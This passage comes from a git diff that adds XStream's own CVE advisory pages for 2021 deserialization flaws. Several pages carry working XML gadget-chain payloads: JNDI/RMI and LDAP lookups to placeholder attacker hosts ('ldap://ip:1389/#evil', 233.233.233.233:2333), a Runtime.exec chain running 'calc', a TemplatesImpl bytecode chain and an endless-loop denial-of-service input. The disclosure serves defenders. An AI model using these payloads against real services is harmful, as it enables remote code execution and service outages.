+<div class="Source Java"><pre>XStream xstream = new XStream();
+xstream.fromXML(xml);
+</pre></div>
+
+ <p>Depending on the JDK, the code from the remote server is executed as soon as the XML gets unmarshalled or when
+ another element is added to the set.</p>
+
+ <p>Note, this example uses XML, but the attack can be performed for any supported format. e.g. JSON.</p>
+
+ <h2 id="impact">Impact</h2>
+
+ <p>The vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by
+ manipulating the processed input stream.</p>
+
+ <h2 id="workarounds">Workarounds</h2>
+
+ <p>See <a href="security.html#workaround">workarounds</a> for the different versions covering all CVEs.</p>
+
+ <h2 id="credits">Credits</h2>
+
+ <p>wh1t3p1g G5-RD6@IIE found and reported the issue to XStream and provided the required information to reproduce it.</p>
+
+ </body>
+ </html>
diff --git a/xstream-distribution/src/content/CVE-2021-29505.html b/xstream-distribution/src/content/CVE-2021-29505.html
new file mode 100644
index 0000000000000000000000000000000000000000..378eab8b601893ffbb3f826ee0baf4791c8426c4
--- /dev/null
+++ b/xstream-distribution/src/content/CVE-2021-29505.html
@@ -0,0 +1,119 @@
+<html>
+<!--
+ Copyright (C) 2021 XStream committers.
+ All rights reserved.
+
+ The software in this package is published under the terms of the BSD
+ style license a copy of which has been included with this distribution in
+ the LICENSE.txt file.
+
+ Created on 8. May 2021 by Joerg Schaible
+ -->
+ <head>
+ <title>CVE-2021-29505</title>
+ </head>
+ <body>
+
+ <h2 id="vulnerability">Vulnerability</h2>
+
+ <p>CVE-2021-29505: XStream is vulnerable to a Remote Command Execution attack.</p>
+
+ <h2 id="affected_versions">Affected Versions</h2>
+
+ <p>All versions until and including version 1.4.16 are affected, if using the version out of the box. No user is
+ affected, who followed the recommendation to setup <a href="security.html#framework">XStream's security
+ framework</a> with a whitelist limited to the minimal required types.</p>
+
+ <h2 id="description">Description</h2>
+
+ <p>The processed stream at unmarshalling time contains type information to recreate the formerly written objects.
+ XStream creates therefore new instances based on these type information. An attacker can manipulate the processed
+ input stream and replace or inject objects, that result in execution of a local command on the server.</p>
+
+ <h2 id="reproduction">Steps to Reproduce</h2>
+
+ <p>Create a simple PriorityQueue and use XStream to marshal it to XML. Replace the XML with following snippet and
+ unmarshal it again with XStream:</p>
+<div class="Source XML"><pre><java.util.PriorityQueue serialization='custom'>
+ <unserializable-parents/>
+ <java.util.PriorityQueue>
+ <default>
+ <size>2</size>
+ </default>
+ <int>3</int>
+ <javax.naming.ldap.Rdn_-RdnEntry>
+ <type>12345</type>
+ <value class='com.sun.org.apache.xpath.internal.objects.XString'>
+ <m__obj class='string'>com.sun.xml.internal.ws.api.message.Packet@2002fc1d Content: <none></m__obj>
+ </value>
+ </javax.naming.ldap.Rdn_-RdnEntry>
+ <javax.naming.ldap.Rdn_-RdnEntry>
+ <type>12345</type>
+ <value class='com.sun.xml.internal.ws.api.message.Packet' serialization='custom'>
+ <message class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'>
+ <parsedMessage>true</parsedMessage>
+ <soapVersion>SOAP_11</soapVersion>
+ <bodyParts/>
+ <sm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'>
+ <attachmentsInitialized>false</attachmentsInitialized>
+ <multiPart class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'>
+ <soapPart/>
+ <mm>
+ <it class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'>
+ <aliases class='com.sun.jndi.toolkit.dir.LazySearchEnumerationImpl'>
+ <candidates class='com.sun.jndi.rmi.registry.BindingEnumeration'>
+ <names>
+ <string>aa</string>
+ <string>aa</string>
+ </names>
+ <ctx>
+ <environment/>
+ <registry class='sun.rmi.registry.RegistryImpl_Stub' serialization='custom'>
+ <java.rmi.server.RemoteObject>
+ <string>UnicastRef</string>
+ <string>ip2</string>
+ <int>1099</int>
+ <long>0</long>
+ <int>0</int>
+ <short>0</short>
+ <boolean>false</boolean>
+ </java.rmi.server.RemoteObject>
+ </registry>
+ <host>ip2</host>
+ <port>1099</port>
+ </ctx>
+ </candidates>
+ </aliases>
+ </it>
+ </mm>
+ </multiPart>
+ </sm>
+ </message>
+ </value>
+ </javax.naming.ldap.Rdn_-RdnEntry>
+ </java.util.PriorityQueue>
+</java.util.PriorityQueue>
+</pre></div>
+<div class="Source Java"><pre>XStream xstream = new XStream();
+xstream.fromXML(xml);
+</pre></div>
+
+ <p>As soon as the XML gets unmarshalled, the payload gets executed and the command is executed on the host.</p>
+
+ <p>Note, this example uses XML, but the attack can be performed for any supported format. e.g. JSON.</p>
+
+ <h2 id="impact">Impact</h2>
+
+ <p>The vulnerability may allow a remote attacker has sufficient rights to execute commands of the host only by
+ manipulating the processed input stream.</p>
+
+ <h2 id="workarounds">Workarounds</h2>
+
+ <p>See <a href="security.html#workaround">workarounds</a> for the different versions covering all CVEs.</p>
+
+ <h2 id="credits">Credits</h2>
+
+ <p>V3geB1rd, white hat hacker from Tencent Security Response Center found and reported the issue to XStream and provided the required information to reproduce it.</p>
+
+ </body>
+ </html>
diff --git a/xstream-distribution/src/content/CVE-2021-39139.html b/xstream-distribution/src/content/CVE-2021-39139.html
new file mode 100644
index 0000000000000000000000000000000000000000..b033d12a346a99f388013c0ce8567812b7516fa3
--- /dev/null
+++ b/xstream-distribution/src/content/CVE-2021-39139.html
@@ -0,0 +1,93 @@
+<html>
+<!--
+ Copyright (C) 2021 XStream committers.
+ All rights reserved.
+
+ The software in this package is published under the terms of the BSD
+ style license a copy of which has been included with this distribution in
+ the LICENSE.txt file.
+
+ Created on 26. May 2021 by Joerg Schaible
+ -->
+ <head>
+ <title>CVE-2021-39139</title>
+ </head>
+ <body>
+
+ <h2 id="vulnerability">Vulnerability</h2>
+
+ <p>CVE-2021-39139: XStream is vulnerable to an Arbitrary Code Execution attack.</p>
+
+ <h2 id="affected_versions">Affected Versions</h2>
+
+ <p>All versions until and including version 1.4.17 are affected, if using the version out of the box with JDK
+ 1.7u21 or below. However, this scenario can be adjusted easily to an external Xalan that works regardless of the
+ version of the Java runtime. No user is affected, who followed the recommendation to setup
+ <a href="security.html#framework">XStream's security framework</a> with a whitelist limited to the minimal required
+ types.</p>
+
+ <h2 id="description">Description</h2>
+
+ <p>The processed stream at unmarshalling time contains type information to recreate the formerly written objects.
+ XStream creates therefore new instances based on these type information. An attacker can manipulate the processed
+ input stream and replace or inject objects, that result in execution of arbitrary code loaded from a remote server.</p>
+
+ <h2 id="reproduction">Steps to Reproduce</h2>
+
+ <p>Create a simple LinkedHashSet and use XStream to marshal it to XML. Replace the XML with following snippet and
+ unmarshal it again with XStream:</p>
+<div class="Source XML"><pre><linked-hash-set>
+ <com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl serialization='custom'>
+ <com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl>
+ <default>
+ <__name>Pwnr</__name>
+ <__bytecodes>
+ <byte-array>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</byte-array>
+ <byte-array>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</byte-array>
+ </__bytecodes>
+ <__transletIndex>-1</__transletIndex>
+ <__indentNumber>0</__indentNumber>
+ </default>
+ </com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl>
+ </com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl>
+ <dynamic-proxy>
+ <interface>javax.xml.transform.Templates</interface>
+ <handler class='sun.reflect.annotation.AnnotationInvocationHandler' serialization='custom'>
+ <sun.reflect.annotation.AnnotationInvocationHandler>
+ <default>
+ <memberValues>
+ <entry>
+ <string>f5a5a608</string>
+ <com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl reference='../../../../../../../com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl'/>
+ </entry>
+ </memberValues>
+ <type>javax.xml.transform.Templates</type>
+ </default>
+ </sun.reflect.annotation.AnnotationInvocationHandler>
+ </handler>
+ </dynamic-proxy>
+</linked-hash-set>
+</pre></div>
+<div class="Source Java"><pre>XStream xstream = new XStream();
+xstream.fromXML(xml);
+</pre></div>
+
+ <p>Depending on the JDK, the code from the remote server is executed as soon as the XML gets unmarshalled.</p>
+
+ <p>Note, this example uses XML, but the attack can be performed for any supported format. e.g. JSON.</p>
+
+ <h2 id="impact">Impact</h2>
+
+ <p>The vulnerability may allow a remote attacker to execute arbitrary code only by manipulating the processed
+ input stream.</p>
+
+ <h2 id="workarounds">Workarounds</h2>
+
+ <p>See <a href="security.html#workaround">workarounds</a> for the different versions covering all CVEs.</p>
+
+ <h2 id="credits">Credits</h2>
+
+ <p>Lai Han of nsfocus security team found and reported the issue to XStream and provided the required information to reproduce it.</p>
+
+ </body>
+ </html>
diff --git a/xstream-distribution/src/content/CVE-2021-39140.html b/xstream-distribution/src/content/CVE-2021-39140.html
new file mode 100644
index 0000000000000000000000000000000000000000..b51ade26ea5ef708f000cfb35d6a020a96ce80c7
--- /dev/null
+++ b/xstream-distribution/src/content/CVE-2021-39140.html
@@ -0,0 +1,74 @@
+<html>
+<!--
+ Copyright (C) 2021 XStream committers.
+ All rights reserved.
+
+ The software in this package is published under the terms of the BSD
+ style license a copy of which has been included with this distribution in
+ the LICENSE.txt file.
+
+ Created on 27. May 2021 by Joerg Schaible
+ -->
+ <head>
+ <title>CVE-2021-39140</title>
+ </head>
+ <body>
+
+ <h2 id="vulnerability">Vulnerability</h2>
+
+ <p>CVE-2021-39140: XStream is vulnerable to a Denial of Service attack.</p>
+
+ <h2 id="affected_versions">Affected Versions</h2>
+
+ <p>All versions until and including version 1.4.17 are affected, if using the version out of the box. No user is
+ affected, who followed the recommendation to setup <a href="security.html#framework">XStream's security framework
+ </a> with a whitelist limited to the minimal required types.</p>
+
+ <h2 id="description">Description</h2>
+
+ <p>The processed stream at unmarshalling time contains type information to recreate the formerly written objects.
+ XStream creates therefore new instances based on these type information. An attacker can manipulate the processed
+ input stream and replace or inject objects, that result in an endless loop probably causing a denial of service.</p>
+
+ <h2 id="reproduction">Steps to Reproduce</h2>
+
+ <p>Create a simple TreeSet and use XStream to marshal it to XML. Replace the XML with following snippet and
+ unmarshal it again with XStream:</p>
+<div class="Source XML"><pre><linked-hash-set>
+ <sun.reflect.annotation.AnnotationInvocationHandler serialization='custom'>
+ <sun.reflect.annotation.AnnotationInvocationHandler>
+ <default>
+ <memberValues class='javax.script.SimpleBindings'>
+ <map class='javax.script.SimpleBindings' reference='..'/>
+ </memberValues>
+ <type>javax.xml.transform.Templates</type>
+ </default>
+ </sun.reflect.annotation.AnnotationInvocationHandler>
+ </sun.reflect.annotation.AnnotationInvocationHandler>
+</linked-hash-set>
+</pre></div>
+<div class="Source Java"><pre>XStream xstream = new XStream();
+xstream.fromXML(xml);
+</pre></div>
+
+ <p>As soon as the XML gets unmarshalled, the an endless loop is entered and the executing thread consumes maximum
+ CPU time and will never return.</p>
+
+ <p>Note, this example uses XML, but the attack can be performed for any supported format. e.g. JSON.</p>
+
+ <h2 id="impact">Impact</h2>
+
+ <p>The vulnerability may allow a remote attacker to allocate 100% CPU time on the target system depending on CPU
+ type or parallel execution of such a payload resulting in a denial of service only by manipulating the processed
+ input stream.</p>
+
+ <h2 id="workarounds">Workarounds</h2>
+
+ <p>See <a href="security.html#workaround">workarounds</a> for the different versions covering all CVEs.</p>
+
+ <h2 id="credits">Credits</h2>
+
+ <p>Lai Han of nsfocus security team found and reported the issue to XStream and provided the required information to reproduce it.</p>
+
+ </body>
+ </html>
diff --git a/xstream-distribution/src/content/CVE-2021-39141.html b/xstream-distribution/src/content/CVE-2021-39141.html
new file mode 100644
index 0000000000000000000000000000000000000000..d531115b08c63f542ef323f7c2fdfb2f8b89e558
--- /dev/null
+++ b/xstream-distribution/src/content/CVE-2021-39141.html
@@ -0,0 +1,232 @@
+<html>
+<!--
+ Copyright (C) 2021 XStream committers.
+ All rights reserved.
+
+ The software in this package is published under the terms of the BSD
+ style license a copy of which has been included with this distribution in
+ the LICENSE.txt file.
+
+ Created on 27. May 2021 by Joerg Schaible
+ -->
+ <head>
+ <title>CVE-2021-39141</title>
+ </head>
+ <body>
+
+ <h2 id="vulnerability">Vulnerability</h2>
+
+ <p>CVE-2021-39141: XStream is vulnerable to an Arbitrary Code Execution attack.</p>
+
+ <h2 id="affected_versions">Affected Versions</h2>
+
+ <p>All versions until and including version 1.4.17 are affected, if using the version out of the box. No user is
+ affected, who followed the recommendation to setup <a href="security.html#framework">XStream's security
+ framework</a> with a whitelist limited to the minimal required types.</p>
+
+ <h2 id="description">Description</h2>
+
+ <p>The processed stream at unmarshalling time contains type information to recreate the formerly written objects.
+ XStream creates therefore new instances based on these type information. An attacker can manipulate the processed
+ input stream and replace or inject objects, that result in execution of arbitrary code loaded from a remote server.</p>
+
+ <h2 id="reproduction">Steps to Reproduce</h2>
+
+ <p>Create a simple PriorityQueue and use XStream to marshal it to XML. Replace the XML with following snippet and
+ unmarshal it again with XStream:</p>
+<div class="Source XML"><pre><java.util.PriorityQueue serialization='custom'>
+ <unserializable-parents/>
+ <java.util.PriorityQueue>
+ <default>
+ <size>2</size>
+ </default>
+ <int>3</int>
+ <dynamic-proxy>
+ <interface>java.lang.Comparable</interface>
+ <handler class='com.sun.xml.internal.ws.client.sei.SEIStub'>
+ <owner/>
+ <managedObjectManagerClosed>false</managedObjectManagerClosed>
+ <databinding class='com.sun.xml.internal.ws.db.DatabindingImpl'>
+ <stubHandlers>
+ <entry>
+ <method>
+ <class>java.lang.Comparable</class>
+ <name>compareTo</name>
+ <parameter-types>
+ <class>java.lang.Object</class>
+ </parameter-types>
+ </method>
+ <com.sun.xml.internal.ws.client.sei.StubHandler>
+ <bodyBuilder class='com.sun.xml.internal.ws.client.sei.BodyBuilder$DocLit'>
+ <indices>
+ <int>0</int>
+ </indices>
+ <getters>
+ <com.sun.xml.internal.ws.client.sei.ValueGetter>PLAIN</com.sun.xml.internal.ws.client.sei.ValueGetter>
+ </getters>
+ <accessors>
+ <com.sun.xml.internal.ws.spi.db.JAXBWrapperAccessor_-2>
+ <val_-isJAXBElement>false</val_-isJAXBElement>
+ <val_-getter class='com.sun.xml.internal.ws.spi.db.FieldGetter'>
+ <type>int</type>
+ <field>
+ <name>hash</name>
+ <clazz>java.lang.String</clazz>
+ </field>
+ </val_-getter>
+ <val_-isListType>false</val_-isListType>
+ <val_-n>
+ <namespaceURI/>
+ <localPart>hash</localPart>
+ <prefix/>
+ </val_-n>
+ <val_-setter class='com.sun.xml.internal.ws.spi.db.MethodSetter'>
+ <type>java.lang.String</type>
+ <method>
+ <class>javax.naming.InitialContext</class>
+ <name>doLookup</name>
+ <parameter-types>
+ <class>java.lang.String</class>
+ </parameter-types>
+ </method>
+ </val_-setter>
+ <outer-class>
+ <propertySetters>
+ <entry>
+ <string>serialPersistentFields</string>
+ <com.sun.xml.internal.ws.spi.db.FieldSetter>
+ <type>[Ljava.io.ObjectStreamField;</type>
+ <field>
+ <name>serialPersistentFields</name>
+ <clazz>java.lang.String</clazz>
+ </field>
+ </com.sun.xml.internal.ws.spi.db.FieldSetter>
+ </entry>
+ <entry>
+ <string>CASE_INSENSITIVE_ORDER</string>
+ <com.sun.xml.internal.ws.spi.db.FieldSetter>
+ <type>java.util.Comparator</type>
+ <field>
+ <name>CASE_INSENSITIVE_ORDER</name>
+ <clazz>java.lang.String</clazz>
+ </field>
+ </com.sun.xml.internal.ws.spi.db.FieldSetter>
+ </entry>
+ <entry>
+ <string>serialVersionUID</string>
+ <com.sun.xml.internal.ws.spi.db.FieldSetter>
+ <type>long</type>
+ <field>
+ <name>serialVersionUID</name>
+ <clazz>java.lang.String</clazz>
+ </field>
+ </com.sun.xml.internal.ws.spi.db.FieldSetter>
+ </entry>
+ <entry>
+ <string>value</string>
+ <com.sun.xml.internal.ws.spi.db.FieldSetter>
+ <type>[C</type>
+ <field>
+ <name>value</name>
+ <clazz>java.lang.String</clazz>
+ </field>
+ </com.sun.xml.internal.ws.spi.db.FieldSetter>
+ </entry>
+ <entry>
+ <string>hash</string>
+ <com.sun.xml.internal.ws.spi.db.FieldSetter>
+ <type>int</type>
+ <field reference='../../../../../val_-getter/field'/>
+ </com.sun.xml.internal.ws.spi.db.FieldSetter>
+ </entry>
+ </propertySetters>
+ <propertyGetters>
+ <entry>
+ <string>serialPersistentFields</string>
+ <com.sun.xml.internal.ws.spi.db.FieldGetter>
+ <type>[Ljava.io.ObjectStreamField;</type>
+ <field reference='../../../../propertySetters/entry/com.sun.xml.internal.ws.spi.db.FieldSetter/field'/>
+ </com.sun.xml.internal.ws.spi.db.FieldGetter>
+ </entry>
+ <entry>
+ <string>CASE_INSENSITIVE_ORDER</string>
+ <com.sun.xml.internal.ws.spi.db.FieldGetter>
+ <type>java.util.Comparator</type>
+ <field reference='../../../../propertySetters/entry[2]/com.sun.xml.internal.ws.spi.db.FieldSetter/field'/>
+ </com.sun.xml.internal.ws.spi.db.FieldGetter>
+ </entry>
+ <entry>
+ <string>serialVersionUID</string>
+ <com.sun.xml.internal.ws.spi.db.FieldGetter>
+ <type>long</type>
+ <field reference='../../../../propertySetters/entry[3]/com.sun.xml.internal.ws.spi.db.FieldSetter/field'/>
+ </com.sun.xml.internal.ws.spi.db.FieldGetter>
+ </entry>
+ <entry>
+ <string>value</string>
+ <com.sun.xml.internal.ws.spi.db.FieldGetter>
+ <type>[C</type>
+ <field reference='../../../../propertySetters/entry[4]/com.sun.xml.internal.ws.spi.db.FieldSetter/field'/>
+ </com.sun.xml.internal.ws.spi.db.FieldGetter>
+ </entry>
+ <entry>
+ <string>hash</string>
+ <com.sun.xml.internal.ws.spi.db.FieldGetter reference='../../../../val_-getter'/>
+ </entry>
+ </propertyGetters>
+ <elementLocalNameCollision>false</elementLocalNameCollision>
+ <contentClass>java.lang.String</contentClass>
+ <elementDeclaredTypes/>
+ </outer-class>
+ </com.sun.xml.internal.ws.spi.db.JAXBWrapperAccessor_-2>
+ </accessors>
+ <wrapper>java.lang.Object</wrapper>
+ <bindingContext class='com.sun.xml.internal.ws.db.glassfish.JAXBRIContextWrapper'/>
+ <dynamicWrapper>false</dynamicWrapper>
+ </bodyBuilder>
+ <isOneWay>false</isOneWay>
+ </com.sun.xml.internal.ws.client.sei.StubHandler>
+ </entry>
+ </stubHandlers>
+ <clientConfig>false</clientConfig>
+ </databinding>
+ <methodHandlers>
+ <entry>
+ <method reference='../../../databinding/stubHandlers/entry/method'/>
+ <com.sun.xml.internal.ws.client.sei.SyncMethodHandler>
+ <owner reference='../../../..'/>
+ <method reference='../../../../databinding/stubHandlers/entry/method'/>
+ <isVoid>false</isVoid>
+ <isOneway>false</isOneway>
+ </com.sun.xml.internal.ws.client.sei.SyncMethodHandler>
+ </entry>
+ </methodHandlers>
+ </handler>
+ </dynamic-proxy>
+ <string>ldap://ip:1389/#evil</string>
+ </java.util.PriorityQueue>
+</java.util.PriorityQueue>
+</pre></div>
+<div class="Source Java"><pre>XStream xstream = new XStream();
+xstream.fromXML(xml);
+</pre></div>
+
+ <p>As soon as the XML gets unmarshalled, the code from the remote server is executed as soon as the XML gets unmarshalled.</p>
+
+ <p>Note, this example uses XML, but the attack can be performed for any supported format. e.g. JSON.</p>
+
+ <h2 id="impact">Impact</h2>
+
+ <p>The vulnerability may allow a remote attacker to execute arbitrary code only by manipulating the processed
+ input stream.</p>
+
+ <h2 id="workarounds">Workarounds</h2>
+
+ <p>See <a href="security.html#workaround">workarounds</a> for the different versions covering all CVEs.</p>
+
+ <h2 id="credits">Credits</h2>
+
+ <p>Ceclin and YXXX from the Tencent Security Response Center found and reported the issue to XStream and provided the required information to reproduce it.</p>
+
+ </body>
+ </html>
diff --git a/xstream-distribution/src/content/CVE-2021-39144.html b/xstream-distribution/src/content/CVE-2021-39144.html
new file mode 100644
index 0000000000000000000000000000000000000000..1c7251adf8c7bb68620352fdb5b431ead6e7dc23
--- /dev/null
+++ b/xstream-distribution/src/content/CVE-2021-39144.html
@@ -0,0 +1,98 @@
+<html>
+<!--
+ Copyright (C) 2021 XStream committers.
+ All rights reserved.
+
+ The software in this package is published under the terms of the BSD
+ style license a copy of which has been included with this distribution in
+ the LICENSE.txt file.
+
+ Created on 27. May 2021 by Joerg Schaible
+ -->
+ <head>
+ <title>CVE-2021-39144</title>
+ </head>
+ <body>
+
+ <h2 id="vulnerability">Vulnerability</h2>
+
+ <p>CVE-2021-39144: XStream is vulnerable to a Remote Command Execution attack.</p>
+
+ <h2 id="affected_versions">Affected Versions</h2>
+
+ <p>All versions until and including version 1.4.17 are affected, if using the version out of the box. No user is
+ affected, who followed the recommendation to setup <a href="security.html#framework">XStream's security
+ framework</a> with a whitelist limited to the minimal required types.</p>
+
+ <h2 id="description">Description</h2>
+
+ <p>The processed stream at unmarshalling time contains type information to recreate the formerly written objects.
+ XStream creates therefore new instances based on these type information. An attacker can manipulate the processed
+ input stream and replace or inject objects, that result in execution of a local command on the server.</p>
+
+ <h2 id="reproduction">Steps to Reproduce</h2>
+
+ <p>Create a simple PriorityQueue and use XStream to marshal it to XML. Replace the XML with following snippet and
+ unmarshal it again with XStream:</p>
+<div class="Source XML"><pre><java.util.PriorityQueue serialization='custom'>
+ <unserializable-parents/>
+ <java.util.PriorityQueue>
+ <default>
+ <size>2</size>
+ </default>
+ <int>3</int>
+ <dynamic-proxy>
+ <interface>java.lang.Comparable</interface>
+ <handler class='sun.tracing.NullProvider'>
+ <active>true</active>
+ <providerType>java.lang.Comparable</providerType>
+ <probes>
+ <entry>
+ <method>
+ <class>java.lang.Comparable</class>
+ <name>compareTo</name>
+ <parameter-types>
+ <class>java.lang.Object</class>
+ </parameter-types>
+ </method>
+ <sun.tracing.dtrace.DTraceProbe>
+ <proxy class='java.lang.Runtime'/>
+ <implementing__method>
+ <class>java.lang.Runtime</class>
+ <name>exec</name>
+ <parameter-types>
+ <class>java.lang.String</class>
+ </parameter-types>
+ </implementing__method>
+ </sun.tracing.dtrace.DTraceProbe>
+ </entry>
+ </probes>
+ </handler>
+ </dynamic-proxy>
+ <string>calc</string>
+ </java.util.PriorityQueue>
+</java.util.PriorityQueue>
+</pre></div>
+<div class="Source Java"><pre>XStream xstream = new XStream();
+xstream.fromXML(xml);
+</pre></div>
+
+ <p>As soon as the XML gets unmarshalled, the payload gets executed and the command is executed on the host.</p>
+
+ <p>Note, this example uses XML, but the attack can be performed for any supported format. e.g. JSON.</p>
+
+ <h2 id="impact">Impact</h2>
+
+ <p>The vulnerability may allow a remote attacker to execute commands with the rights of the process owner on the
+ host only by manipulating the processed input stream.</p>
+
+ <h2 id="workarounds">Workarounds</h2>
+
+ <p>See <a href="security.html#workaround">workarounds</a> for the different versions covering all CVEs.</p>
+
+ <h2 id="credits">Credits</h2>
+
+ <p>Ceclin and YXXX from the Tencent Security Response Center found and reported the issue to XStream and provided the required information to reproduce it.</p>
+
+ </body>
+ </html>
diff --git a/xstream-distribution/src/content/CVE-2021-39145.html b/xstream-distribution/src/content/CVE-2021-39145.html
new file mode 100644
index 0000000000000000000000000000000000000000..1ba8e00ce0a982e1a3e09dfc42c8c2f6b6a60a3c
--- /dev/null
+++ b/xstream-distribution/src/content/CVE-2021-39145.html
@@ -0,0 +1,160 @@
+<html>
+<!--
+ Copyright (C) 2021 XStream committers.
+ All rights reserved.
+
+ The software in this package is published under the terms of the BSD
+ style license a copy of which has been included with this distribution in
+ the LICENSE.txt file.
+
+ Created on 26. May 2021 by Joerg Schaible
+ -->
+ <head>
+ <title>CVE-2021-39145</title>
+ </head>
+ <body>
+
+ <h2 id="vulnerability">Vulnerability</h2>
+
+ <p>CVE-2021-39145: XStream is vulnerable to an Arbitrary Code Execution attack.</p>
+
+ <h2 id="affected_versions">Affected Versions</h2>
+
+ <p>All versions until and including version 1.4.17 are affected, if using the version out of the box. No user is
+ affected, who followed the recommendation to setup <a href="security.html#framework">XStream's security framework
+ </a> with a whitelist limited to the minimal required types.</p>
+
+ <h2 id="description">Description</h2>
+
+ <p>The processed stream at unmarshalling time contains type information to recreate the formerly written objects.
+ XStream creates therefore new instances based on these type information. An attacker can manipulate the processed
+ input stream and replace or inject objects, that result in execution of arbitrary code loaded from a remote server.</p>
+
+ <h2 id="reproduction">Steps to Reproduce</h2>
+
+ <p>Create a simple PriorityQueue and use XStream to marshal it to XML. Replace the XML with following snippet and
+ unmarshal it again with XStream:</p>
+<div class="Source XML"><pre><java.util.PriorityQueue serialization='custom'>
+ <unserializable-parents/>
+ <java.util.PriorityQueue>
+ <default>
+ <size>2</size>
+ </default>
+ <int>3</int>
+ <javax.naming.ldap.Rdn_-RdnEntry>
+ <type>12345</type>
+ <value class='com.sun.org.apache.xpath.internal.objects.XString'>
+ <m__obj class='string'>com.sun.xml.internal.ws.api.message.Packet@2002fc1d Content: &#x3C;none&#x3E;</m__obj>
+ </value>
+ </javax.naming.ldap.Rdn_-RdnEntry>
+ <javax.naming.ldap.Rdn_-RdnEntry>
+ <type>12345</type>
+ <value class='com.sun.xml.internal.ws.api.message.Packet' serialization='custom'>
+ <message class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'>
+ <parsedMessage>true</parsedMessage>
+ <soapVersion>SOAP_11</soapVersion>
+ <bodyParts/>
+ <sm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'>
+ <attachmentsInitialized>false</attachmentsInitialized>
+ <multiPart class='com.sun.xml.internal.messaging.saaj.packaging.mime.internet.MimePullMultipart'>
+ <soapPart/>
+ <mm>
+ <it class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'>
+ <aliases class='com.sun.jndi.ldap.LdapBindingEnumeration'>
+ <homeCtx>
+ <hostname>233.233.233.233</hostname>
+ <port__number>2333</port__number>
+ <clnt class='com.sun.jndi.ldap.LdapClient'/>
+ </homeCtx>
+ <hasMoreCalled>true</hasMoreCalled>
+ <more>true</more>
+ <posn>0</posn>
+ <limit>1</limit>
+ <entries>
+ <com.sun.jndi.ldap.LdapEntry>
+ <DN>uid=songtao.xu,ou=oa,dc=example,dc=com</DN>
+ <attributes class='javax.naming.directory.BasicAttributes' serialization='custom'>
+ <javax.naming.directory.BasicAttribute>
+ <default>
+ <ignoreCase>false</ignoreCase>
+ </default>
+ <int>4</int>
+ <javax.naming.directory.BasicAttribute serialization='custom'>
+ <javax.naming.directory.BasicAttribute>
+ <default>
+ <ordered>false</ordered>
+ <attrID>objectClass</attrID>
+ </default>
+ <int>1</int>
+ <string>javanamingreference</string>
+ </javax.naming.directory.BasicAttribute>
+ </javax.naming.directory.BasicAttribute>
+ <javax.naming.directory.BasicAttribute serialization='custom'>
+ <javax.naming.directory.BasicAttribute>
+ <default>
+ <ordered>false</ordered>
+ <attrID>javaCodeBase</attrID>
+ </default>
+ <int>1</int>
+ <string>http://127.0.0.1:2333/</string>
+ </javax.naming.directory.BasicAttribute>
+ </javax.naming.directory.BasicAttribute>
+ <javax.naming.directory.BasicAttribute serialization='custom'>
+ <javax.naming.directory.BasicAttribute>
+ <default>
+ <ordered>false</ordered>
+ <attrID>javaClassName</attrID>
+ </default>
+ <int>1</int>
+ <string>refClassName</string>
+ </javax.naming.directory.BasicAttribute>
+ </javax.naming.directory.BasicAttribute>
+ <javax.naming.directory.BasicAttribute serialization='custom'>
+ <javax.naming.directory.BasicAttribute>
+ <default>
+ <ordered>false</ordered>
+ <attrID>javaFactory</attrID>
+ </default>
+ <int>1</int>
+ <string>Evil</string>
+ </javax.naming.directory.BasicAttribute>
+ </javax.naming.directory.BasicAttribute>
+ </javax.naming.directory.BasicAttribute>
+ </attributes>
+ </com.sun.jndi.ldap.LdapEntry>
+ </entries>
+ </aliases>
+ </it>
+ </mm>
+ </multiPart>
+ </sm>
+ </message>
+ </value>
+ </javax.naming.ldap.Rdn_-RdnEntry>
+ </java.util.PriorityQueue>
+</java.util.PriorityQueue>
+</pre></div>
+<div class="Source Java"><pre>XStream xstream = new XStream();
+xstream.fromXML(xml);
+</pre></div>
+
+ <p>Depending on the JDK, the code from the remote server is executed as soon as the XML gets unmarshalled.</p>
+
+ <p>Note, this example uses XML, but the attack can be performed for any supported format. e.g. JSON.</p>
+
+ <h2 id="impact">Impact</h2>
+
+ <p>The vulnerability may allow a remote attacker to execute arbitrary code only by manipulating the processed
+ input stream.</p>
+
+ <h2 id="workarounds">Workarounds</h2>
+
+ <p>See <a href="security.html#workaround">workarounds</a> for the different versions covering all CVEs.</p>
+
+ <h2 id="credits">Credits</h2>
+
+ <p>æŽå®‰è¯º (Li4n0) from Alibaba Cloud Security Team and Smi1e of DBAPPSecurity WEBIN Lab found and reported the issue
+ independently to XStream and provided the required information to reproduce it.</p>
+
+ </body>
+ </html>
diff --git a/xstream-distribution/src/content/CVE-2021-39146.html b/xstream-distribution/src/content/CVE-2021-39146.html
new file mode 100644
index 0000000000000000000000000000000000000000..cc5a9712bfa76de88a13f9df52a269150569dcf7
--- /dev/null
+++ b/xstream-distribution/src/content/CVE-2021-39146.html
@@ -0,0 +1,119 @@
+<html>
+<!--
+ Copyright (C) 2021 XStream committers.
+ All rights reserved.
+
+ The software in this package is published under the terms of the BSD
+ style license a copy of which has been included with this distribution in
+ the LICENSE.txt file.
+
+ Created on 26. May 2021 by Joerg Schaible
+ -->
+ <head>
+ <title>CVE-2021-39146</title>
+ </head>
+ <body>
+
+ <h2 id="vulnerability">Vulnerability</h2>
+
+ <p>CVE-2021-39146: XStream is vulnerable to an Arbitrary Code Execution attack.</p>
+
+ <h2 id="affected_versions">Affected Versions</h2>
+
+ <p>All versions until and including version 1.4.17 are affected, if using the version out of the box. No user is
+ affected, who followed the recommendation to setup <a href="security.html#framework">XStream's security framework
+ </a> with a whitelist limited to the minimal required types.</p>
+
+ <h2 id="description">Description</h2>
+
+ <p>The processed stream at unmarshalling time contains type information to recreate the formerly written objects.
